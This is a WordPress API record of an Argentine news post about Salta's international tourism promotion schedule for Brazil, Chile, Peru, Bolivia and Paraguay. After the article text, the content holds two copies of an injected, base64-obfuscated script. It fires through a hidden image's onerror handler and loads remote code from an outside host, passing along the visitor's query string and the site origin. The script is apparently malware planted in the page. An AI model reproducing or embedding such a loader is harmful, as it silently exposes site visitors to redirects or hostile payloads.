{"id":3013,"date":"2023-08-23T13:12:02","date_gmt":"2023-08-23T16:12:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3013"},"modified":"2025-08-14T00:10:01","modified_gmt":"2025-08-14T03:10:01","slug":"la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3013","title":{"rendered":"La promoci\u00f3n tur\u00edstica internacional se enfocar\u00e1 en los mercados de Brasil, Chile, Paraguay, Bolivia y Per\u00fa"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#89033f\"><em>Las acciones de promoci\u00f3n dise\u00f1adas para el \u00faltimo cuatrimestre se enfocan en afianzar el crecimiento de arribos de turistas internacionales. En el caso de Brasil y Per\u00fa, se destacan la conectividad a\u00e9rea directa con dos de los aeropuertos m\u00e1s importantes de Latinoam\u00e9rica.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, present\u00f3 junto a la titular del Inprotur provincial Manuela Arancibia y la directora ejecutiva Mar\u00eda Eugenia Cornejo, la estrategia de promoci\u00f3n internacional para el \u00faltimo cuatrimestre ante la C\u00e1mara de Turismo de Salta. Las acciones presentadas se desarrollar\u00e1n durante el \u00faltimo cuatrimestre del a\u00f1o est\u00e1n orientadas a fortalecer el proceso de comercializaci\u00f3n que el destino Salta lleva adelante en el plano regional internacional.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8516-la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8516-la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru.jpg\" alt=\"La promoci\u00f3n tur\u00edstica internacional se enfocar\u00e1 en los mercados de Brasil, Chile, Paraguay, Bolivia y Per\u00fa\" width=\"346\" height=\"228\"\/><\/a><\/figure><\/div>\n\n\n<p>Se invita a los emprendedores y empresas tur\u00edsticas a sumarse al calendario de promoci\u00f3n internacional inscribi\u00e9ndose en la C\u00e1mara de Turismo de Salta. En este sentido, el ministro Pe\u00f1a inform\u00f3 que las presencias planificadas ser\u00e1n:<\/p>\n\n\n\n<p>* 13 de septiembre, Buy Argentina en San Pablo, Brasil.<\/p>\n\n\n\n<p>* 12 y 13 de septiembre, Buy Argentina en Antofagasta y Calama, Chile.<\/p>\n\n\n\n<p>* 19 de septiembre, Buy Argentina en Lima Per\u00fa. Presentaci\u00f3n de la ruta a\u00e9rea Lima \u2013 Salta.<\/p>\n\n\n\n<p>* 22 a 30 de septiembre, Expocruz, Santa Cruz de la Sierra, Bolivia.<\/p>\n\n\n\n<p>* 12 a 15 de octubre, Buy Argentina y FITPar (stand provincial propio), Asunci\u00f3n Paraguay.<\/p>\n\n\n\n<p>Las acciones de&nbsp;Buy Argentina son organizadas de forma conjunta con Inprotur Naci\u00f3n y la C\u00e1mara Argentina de Turismo.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8517-la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8517-la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru.jpg\" alt=\"La promoci\u00f3n tur\u00edstica internacional se enfocar\u00e1 en los mercados de Brasil, Chile, Paraguay, Bolivia y Per\u00fa\" width=\"267\" height=\"176\"\/><\/a><\/figure><\/div>\n\n\n<p>El detalle de la programaci\u00f3n fue presentada al presidente de la C\u00e1mara, Juan Lucero y al equipo directivo de la instituci\u00f3n.<\/p>\n\n\n\n<p>\u201cEl secreto del \u00e9xito que tenemos en la provincia es el trabajo en equipo que llevamos adelante con el sector privado; Por ese motivo seguimos apostando a esa f\u00f3rmula para que juntos, Gobierno y emprendedores, estemos presentes en estos espacios que representan una oportunidad de crecimiento para todo el sector\u201d, se\u00f1al\u00f3 el ministro Pe\u00f1a.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8518-la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8518-la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru.jpg\" alt=\"La promoci\u00f3n tur\u00edstica internacional se enfocar\u00e1 en los mercados de Brasil, Chile, Paraguay, Bolivia y Per\u00fa\" width=\"320\" height=\"211\"\/><\/a><\/figure><\/div>\n\n\n<p>Las acciones de promoci\u00f3n dise\u00f1adas para el \u00faltimo cuatrimestre del a\u00f1o se enfocan en mercados prioritarios en lo que respecta a la emisi\u00f3n de turistas que a\u00f1o a a\u00f1o visitan la provincia. Adem\u00e1s, en el caso particular de Brasil y Per\u00fa, se destacan la conectividad a\u00e9rea directa con dos de los aeropuertos m\u00e1s importantes de Latinoam\u00e9rica.<\/p>\n\n\n\n<p>Los emprendedores tur\u00edsticos interesados en participar del calendario deber\u00e1n comunicarse con el equipo de la C\u00e1mara de Turismo, de lunes a viernes de 8 a 13:00 al tel\u00e9fono 387210698, a fin de realizar las diferentes consultas e inscripciones pertinentes.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-promocion-turistica-internacional-se-enfocara-en-los-mercados-de-brasil-chile-paraguay-bolivia-y-peru-91378\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las acciones de promoci\u00f3n dise\u00f1adas para el \u00faltimo cuatrimestre se enfocan en afianzar el crecimiento de arribos de turistas internacionales. En el caso de Brasil y Per\u00fa, se destacan la conectividad a\u00e9rea directa con dos de los aeropuertos m\u00e1s importantes de Latinoam\u00e9rica. El ministro de Turismo y Deportes,&nbsp;Mario Pe\u00f1a, present\u00f3 junto a la titular del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3014,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11,22],"tags":[],"class_list":{"0":"post-3013","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles","9":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3013"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3013"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3013\/revisions"}],"predecessor-version":[{"id":6986,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3013\/revisions\/6986"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3014"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3013"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3013"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}